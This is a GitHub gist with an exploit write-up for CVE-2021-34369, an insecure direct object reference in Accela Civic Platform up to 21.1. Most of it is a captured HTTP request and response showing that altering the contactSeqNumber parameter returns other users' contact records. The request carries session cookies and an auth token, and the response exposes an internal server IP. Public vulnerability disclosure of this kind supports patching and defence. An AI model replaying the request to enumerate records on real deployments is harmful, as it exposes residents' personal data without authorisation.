Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
# Exploit Title: Accela Civic Platform Insecure Direct Object References <= 21.1
# Date: June/9/2021
# Exploit Author: Abdul Azeez Alaseeri
# Author page: https://www.linkedin.com/in/0xx777/
# Vendor Homepage: https://www.accela.com/civic-platform/
# CVE-2021-34369
================================================================
Accela Civic Platform Insecure Direct Object References <= 21.1
================================================================
This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber
================================================================
Request Heeaders start
================================================================
GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure
Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure
Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure
Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure
X-XSS-Protection: 0
Pragma: No-cache
X-UA-Compatible: IE=EDGE
Date: Wed, 09 Jun 2021 04:09:40 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98126
================================================================
Response Heeaders end
================================================================
contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment